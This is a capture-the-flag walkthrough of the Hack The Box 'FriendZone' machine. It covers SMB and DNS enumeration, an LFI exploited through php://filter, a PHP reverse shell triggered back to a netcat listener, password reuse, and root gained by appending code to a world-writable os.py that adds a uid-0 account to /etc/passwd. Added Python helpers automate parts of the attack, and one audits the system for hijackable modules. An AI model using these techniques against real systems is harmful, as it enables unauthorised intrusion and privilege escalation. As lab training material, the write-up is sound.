Welcome to the FriendZone writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
FriendZone
Tags: HTB, Easy, Linux, OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Linux
Enumeration
Nmap
To get started, we run a quick scan of all TCP ports.
$ nmap -p- -T4 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 18:23 CEST
Nmap scan report for 10.10.10.123
Host is up (0.094s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 113.60 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 21,22,53,80,139,443,445 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 18:28 CEST
Nmap scan report for 10.10.10.123
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.12 (93%), Linux 3.13 (93%), Linux 3.8 - 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -56m08s, deviation: 1h43m55s, median: 3m51s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2021-04-16T19:32:10+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-16T16:32:10
|_ start_date: N/A
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 93.22 ms 10.10.14.1
2 93.39 ms 10.10.10.123
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.38 seconds
SMB
The host also exposes SMB. We list its shares with a null session (just press Enter at the password prompt) and look for readable files inside them.
$ smbclient -L 10.10.10.123
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Anonymous access works. Within the general share we find some credentials. Note also the comment on the Files share: it leaks the path /etc/Files on disk.
$ smbclient //10.10.10.123/general
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 21:10:51 2019
.. D 0 Wed Jan 23 22:51:02 2019
creds.txt N 57 Wed Oct 10 01:52:42 2018
9221460 blocks of size 1024. 6460352 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \> exit
$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
The Development share is not only readable but writable, so we upload a PHP reverse shell that we may be able to trigger later once we find where the share lives on disk.
$ smbclient //10.10.10.123/Development
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put shell.php
putting file shell.php as \shell.php (7,7 kb/s) (average 7,7 kb/s)
smb: \> ls
. D 0 Sat Apr 17 00:00:42 2021
.. D 0 Wed Jan 23 22:51:02 2019
shell.php A 2233 Sat Apr 17 00:00:42 2021
9221460 blocks of size 1024. 6178548 blocks available
smb: \>
The Nmap results reveal the domain friendzone.red (the commonName of the TLS certificate on port 443), and the website on port 80 shows a second domain in the e-mail address info@friendzoneportal.red.
friendzoneportal.red
DNS Enumeration
The box runs BIND on port 53, so let's ask it for a zone transfer (AXFR) of friendzoneportal.red. A server that answers AXFR for any client is misconfigured (allow-transfer should be restricted to secondaries), and it hands us every name in the zone.
$ dig @10.10.10.123 friendzoneportal.red axfr
; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzoneportal.red axfr
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 100 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: vie abr 16 23:30:02 CEST 2021
;; XFR size: 9 records (messages 1, bytes 309)
friendzone.red
DNS Enumeration
The same DNS server also answers a zone transfer for friendzone.red, the domain from the TLS certificate.
$ dig @10.10.10.123 friendzone.red axfr
; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzone.red axfr
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 96 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: vie abr 16 18:33:55 CEST 2021
;; XFR size: 8 records (messages 1, bytes 289)
We have several subdomains available. Their A records point to 127.0.0.1, which is only meaningful on the server itself, so we add them to /etc/hosts mapped to 10.10.10.123.
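Adding a handful of names to /etc/hosts by hand is error-prone, and the zone's own A records (127.0.0.1) are useless from the attacking box. The following script is an added example, not part of the original writeup: it parses the dig axfr output above and prints one /etc/hosts line that maps every A/AAAA owner name to the target. The function names are this example's own; the sample zone text is copied from the friendzone.red transfer above.

```python
"""Turn a zone transfer into /etc/hosts entries for the target.

Added example, not from the original writeup.  The only input it needs is
the text printed by `dig @10.10.10.123 <zone> axfr`; the function names and
the sample below are assumptions of this example.
"""
import re
import sys

# One resource record as dig prints it: owner TTL class type rdata.
# Only A and AAAA owners are interesting; SOA/NS and ';' comment lines
# never match because their type field is not A/AAAA.
_RR = re.compile(r"^(?P<name>\S+)\.\s+\d+\s+IN\s+(?P<type>A|AAAA)\s+\S+", re.M)


def axfr_hostnames(zone_text):
    """Return the unique owner names of A/AAAA records, in zone order.

    The rdata (127.0.0.1 / ::1 on this box) is ignored on purpose: it is only
    correct from the server's point of view, not from the attacking host.
    """
    names = []
    for match in _RR.finditer(zone_text):
        name = match.group("name")
        if name not in names:
            names.append(name)
    return names


def hosts_line(zone_text, target_ip):
    """Build the single /etc/hosts line mapping every name to target_ip."""
    names = axfr_hostnames(zone_text)
    if not names:
        raise ValueError("no A/AAAA records found: was the zone transfer refused?")
    return target_ip + " " + " ".join(names)


# Constructed sample: the friendzone.red zone as the box returned it.
SAMPLE_ZONE = """\
; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzone.red axfr
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                 604800  IN  AAAA  ::1
friendzone.red.                 604800  IN  NS    localhost.
friendzone.red.                 604800  IN  A     127.0.0.1
administrator1.friendzone.red.  604800  IN  A     127.0.0.1
hr.friendzone.red.              604800  IN  A     127.0.0.1
uploads.friendzone.red.         604800  IN  A     127.0.0.1
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
"""

if __name__ == "__main__":
    # Live usage (assumed file name):
    #   dig @10.10.10.123 friendzone.red axfr | python3 axfr_hosts.py | sudo tee -a /etc/hosts
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_ZONE
    print(hosts_line(text, "10.10.10.123"))
```

Run it once per zone (friendzone.red and friendzoneportal.red) and append the output to /etc/hosts; the names then resolve to the target while the server keeps believing they are 127.0.0.1.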
Recall that the general share gave us creds.txt with credentials for the user admin; those are the first thing to try against the subdomains we just found.
administrator1.friendzone.red
Checking the subdomains one by one, administrator1.friendzone.red over HTTPS shows a login page. The credentials from creds.txt work:
Login Done ! visit /dashboard.php
The dashboard tells us it expects the image_id and pagename parameters (the default it suggests is image_id=a.jpg&pagename=timestamp). So maybe we can upload an image or some other file, and remember that there was a subdomain called uploads.friendzone.red.
Gobuster
Let's brute-force directories and files on the vhost to find something useful to feed to those parameters.
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://administrator1.friendzone.red/ -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://administrator1.friendzone.red/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/04/16 19:07:20 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/16 19:10:35 Finished
===============================================================
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://administrator1.friendzone.red/images/ -x jpg,png,jpeg -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://administrator1.friendzone.red/images/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: jpg,png,jpeg
[+] Timeout: 10s
===============================================================
2021/04/16 19:34:04 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.jpg (Status: 403)
/.htpasswd.png (Status: 403)
/.htpasswd.jpeg (Status: 403)
/.htaccess (Status: 403)
/.htaccess.jpg (Status: 403)
/.htaccess.png (Status: 403)
/.htaccess.jpeg (Status: 403)
/a.jpg (Status: 200)
/b.jpg (Status: 200)
Progress: 16426 / 20471 (80.24%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/04/16 19:44:29 Finished
===============================================================
Playing with the parameters, the pagename parameter (whose default value is timestamp) turns out to be a local file inclusion: whatever we pass is appended with .php and included. Requesting a page name that does not exist shows that the include happened, together with the PHP error message. Let's read the source of dashboard.php itself through the php://filter wrapper, which returns the file base64-encoded instead of executing it:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard
Note that the resource is given without the .php extension, because the script adds it. Decoding the base64 blob gives:
<?php
//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
    echo "<br><br><br>";
    echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
    echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
    if(!isset($_GET["image_id"])){
        echo "<br><br>";
        echo "<center><p>image_name param is missed !</p></center>";
        echo "<center><p>please enter it to show the image</p></center>";
        echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
    }else{
        $image = $_GET["image_id"];
        echo "<center><img src='images/$image'></center>";
        echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
        include($_GET["pagename"].".php");
        //echo $_GET["pagename"];
    }
}else{
    echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>
As the source shows, include() takes whatever we pass in pagename unvalidated and appends .php to it, and it is only reached when image_id is also set. Two more things worth noting: the "login" is nothing more than a comparison of the FriendZoneAuth cookie against a hard-coded value, so anyone who knows that value is logged in without a password, and because the include runs server-side, any PHP file we can write somewhere on disk will be executed as the web server user.
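To drive that include() from a script rather than the browser, here is an added example that is not the author's code: it builds the dashboard.php URL for an arbitrary pagename, the php://filter variant that returns a file's source as base64, and decodes the response. It assumes the base URL https://administrator1.friendzone.red/dashboard.php, the cookie value taken from the source above, and a constructed sample response; the function names are its own. The same dashboard_url() produces the URL that triggers the uploaded shell in the next step.

```python
"""Read PHP source through dashboard.php's include() using php://filter.

Added example, not part of the original writeup.  What it relies on comes
from the dashboard.php source: the image_id/pagename parameters, the ".php"
suffix appended to pagename, and the FriendZoneAuth cookie.  The function
names, BASE_URL and the sample response are assumptions of this example.
"""
import base64
import re
import ssl
import urllib.parse
import urllib.request

BASE_URL = "https://administrator1.friendzone.red/dashboard.php"
AUTH_COOKIE = "FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1"  # hard-coded in the source


def dashboard_url(pagename, base_url=BASE_URL):
    """URL that makes the script include(<pagename>.php).

    image_id must be present or the include() branch is never reached, and
    pagename is given WITHOUT .php because the script appends it.
    """
    query = urllib.parse.urlencode({"image_id": "a.jpg", "pagename": pagename})
    return base_url + "?" + query


def filter_url(resource, base_url=BASE_URL):
    """URL that returns <resource>.php base64-encoded instead of executing it."""
    return dashboard_url("php://filter/convert.base64-encode/resource=" + resource, base_url)


# A run of base64 characters; the page's own markup never produces one this long.
_B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_filter_output(html):
    """Pull the longest base64 run out of the response and decode it."""
    runs = _B64.findall(html)
    if not runs:
        raise ValueError("no base64 payload in response: wrong resource or cookie?")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")


def fetch_source(resource, base_url=BASE_URL):
    """Fetch and decode <resource>.php from the target (needs network access)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False      # the box's certificate is self-signed and expired
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(filter_url(resource, base_url),
                                 headers={"Cookie": AUTH_COOKIE})
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return decode_filter_output(resp.read().decode("utf-8", "replace"))


# Constructed sample response: the page as it looks when include() emits the
# base64 of a tiny PHP file (our own placeholder) instead of rendering it.
SAMPLE_PHP = "<?php\n$secret = 'constructed';\n?>\n"
SAMPLE_RESPONSE = (
    "<title>FriendZone Admin !</title><br><br><br>"
    "<center><img src='images/a.jpg'></center>"
    "<center><h1>Something went worng ! , the script include wrong param !</h1></center>"
    + base64.b64encode(SAMPLE_PHP.encode()).decode()
)

if __name__ == "__main__":
    print(filter_url("dashboard"))                  # read the dashboard's own source
    print(dashboard_url("/etc/Development/shell"))  # execute our uploaded shell.php
    print(decode_filter_output(SAMPLE_RESPONSE))    # offline demo on the sample
```

fetch_source("dashboard") against the live box returns exactly the source listed above; any other resource name without its extension (for example "login") can be read the same way, as long as the web server user can open it.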
Recall that we uploaded a PHP shell to the Development share. We do not know its path on disk, but the share comment for Files gave /etc/Files, so a reasonable guess is that Development is served from /etc/Development. We start a listener and trigger our shell through the LFI.
Exploitation
We request https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell, passing the path of our shell in the pagename parameter without the .php extension (the script appends it), and the reverse shell connects back to our listener.
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.123] 38554
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
00:54:54 up 5:28, 0 users, load average: 0.00, 0.00, 0.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (515): Inappropriate ioctl for device
bash: no job control in this shell
www-data@FriendZone:/$
The user flag in /home/friend is already readable by www-data.
www-data@FriendZone:/home/friend$ cat user.txt
CENSORED_FLAG
Post exploitation
Privilege escalation: www-data to friend
Inside the /var/www directory we find a file mysql_data.conf containing MySQL credentials for the user friend. The same password is reused for the friend system account, so it also gets us an SSH login.
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
And now, let's connect with SSH!
$ ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ECDSA key fingerprint is SHA256:/CZVUU5zAwPEcbKUWZ5tCtCrEemowPRMQo5yRXTWxgw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ECDSA) to the list of known hosts.
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
Privilege escalation: friend to root
Pspy
Running pspy to watch process creation, we see root (UID=0) launching /opt/server_admin/reporter.py through /bin/sh -c, the typical signature of a cron job.
2021/04/17 01:58:01 CMD: UID=0 PID=17217 | /usr/bin/python /opt/server_admin/reporter.py
2021/04/17 01:58:01 CMD: UID=0 PID=17216 | /bin/sh -c /opt/server_admin/reporter.py
reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
Looking at the script, nothing runs except a print, but it imports the os module. Its shebang is /usr/bin/python, so that is the Python 2 module /usr/lib/python2.7/os.py. Listing its permissions shows it is world-writable, so we can inject a payload into it that runs as root every time cron launches reporter.py (and, in fact, every time any Python 2 process imports os).
friend@FriendZone:~$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
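The check the author did by hand (ls -la on one module) generalizes to the whole import path of the interpreter the cron job uses. The following is an added example, not from the writeup: it reports every directory and .py file on that path that group or others can write. A writable directory is just as dangerous as a writable file, since a rogue module dropped there shadows the real one. The interpreter /usr/bin/python comes from the pspy output; the function names and the constructed sample directory are this example's own.

```python
"""Find Python modules on an interpreter's import path that a low-privileged
user could hijack.

Added example, not part of the original writeup.  Run it on the box with the
interpreter the privileged job uses (/usr/bin/python per the pspy output);
the function names and the sample directory below are this example's own.
"""
import os
import stat
import subprocess
import sys
import tempfile


def is_writable_by_others(path):
    """True if the group or world write bit is set on `path` itself.

    Symlinks are not judged (their target is reached via the directory scan).
    Ownership is deliberately not considered so the result is the same
    whoever runs the check; add an owner test if your threat model needs it.
    """
    mode = os.lstat(path).st_mode
    if stat.S_ISLNK(mode):
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def hijackable_modules(sys_path):
    """Return [(path, reason)] for writable directories and .py files.

    A writable directory matters even when every file in it is read-only:
    an attacker can drop a new os.py there and it is imported all the same.
    """
    findings = []
    for directory in sys_path:
        if not directory or not os.path.isdir(directory):
            continue            # '' means cwd of the job; skip unknowns
        if is_writable_by_others(directory):
            findings.append((directory, "writable directory"))
        for name in sorted(os.listdir(directory)):
            if name.endswith(".py"):
                full = os.path.join(directory, name)
                if is_writable_by_others(full):
                    findings.append((full, "writable module"))
    return findings


def interpreter_sys_path(python="/usr/bin/python"):
    """Ask another interpreter for its sys.path (the cron job's, not ours)."""
    out = subprocess.check_output(
        [python, "-c", "import sys; print('\\n'.join(sys.path))"])
    return out.decode().splitlines()


def make_sample_tree():
    """Constructed sample: a throw-away library directory holding one module
    that is world-writable (like the box's os.py) and one that is not.
    Returns (directory, writable_module, safe_module)."""
    directory = tempfile.mkdtemp(prefix="pyhijack-")
    os.chmod(directory, 0o755)
    bad = os.path.join(directory, "os.py")
    good = os.path.join(directory, "safe.py")
    for path, mode in ((bad, 0o777), (good, 0o644)):
        with open(path, "w") as fh:
            fh.write("# placeholder module\n")
        os.chmod(path, mode)
    return directory, bad, good


if __name__ == "__main__":
    python = sys.argv[1] if len(sys.argv) > 1 else "/usr/bin/python"
    for path, reason in hijackable_modules(interpreter_sys_path(python)):
        print("%-20s %s" % (reason, path))
```

On this box the output would include "writable module /usr/lib/python2.7/os.py"; on a correctly installed system the list is empty, which is the state a defender wants to verify after patching.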
Exploitation
We append the following lines to the end of os.py. The next time a root process imports os (the cron job), they add an account with uid 0 to /etc/passwd; the guard keeps the payload from appending the line more than once. The second field is a traditional crypt(3) password hash; generate your own (for example with openssl passwd) rather than reusing this one. Before leaving the file, import it once as friend (python -c 'import os'): a syntax error in os.py would break every Python 2 program on the box, including the cron job we depend on.
# Appended to /usr/lib/python2.7/os.py: executes inside every Python 2 process
# that imports os, including the root cron job running reporter.py.
passwd = open('/etc/passwd', 'r').readlines()
if not any('x4v1l0k' in s for s in passwd):
    output = open('/etc/passwd', 'a')
    # uid 0 / gid 0 makes this a second root account; the hash is crypt(3)
    output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash\n')
    output.close()
Now we just have to wait for the cron job to run, then switch to the new account with the password matching the hash... and we are root!
friend@FriendZone:~$ su x4v1l0k
Password:
root@FriendZone:/home/friend# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:/home/friend# cat /root/root.txt
CENSORED_FLAG